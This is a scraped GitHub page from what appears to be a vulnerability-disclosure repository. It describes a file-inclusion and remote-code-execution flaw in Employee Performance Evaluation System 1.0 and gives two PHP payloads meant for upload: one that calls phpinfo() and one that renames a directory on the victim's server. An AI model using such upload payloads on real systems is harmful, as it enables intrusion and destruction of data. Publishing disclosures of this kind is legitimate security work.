Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0/
CVE-nu11secur1ty/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

Employee-Performance-Evaluation-1.0

Vendor

Description:

The Employee Performance Evaluation System-1.0 suffer from File Inclusion - RCE Vulnerabilities. The usual user of this system is allowed to submit a malicious file or upload a malicious file to the server. After then this user can execute remotely the already malicious included file on the server of the victim. This can bring the system to disaster or can destroy all information that is inside or this information can be stolen.

STATUS: CRITICAL Vulnerability

[+]Get Info:

<?php
// by nu11secur1ty - 2023
	phpinfo();
?>

[+]Exploit:

<?php 
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ; 
  
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ; 
  
// using rename() function to rename the file
rename( $old_name, $new_name) ;
  
?>

RCE using curl protocol

Reproduce:

href

Proof and Exploit:

href

Reference:

href

Time spend:

00:17:00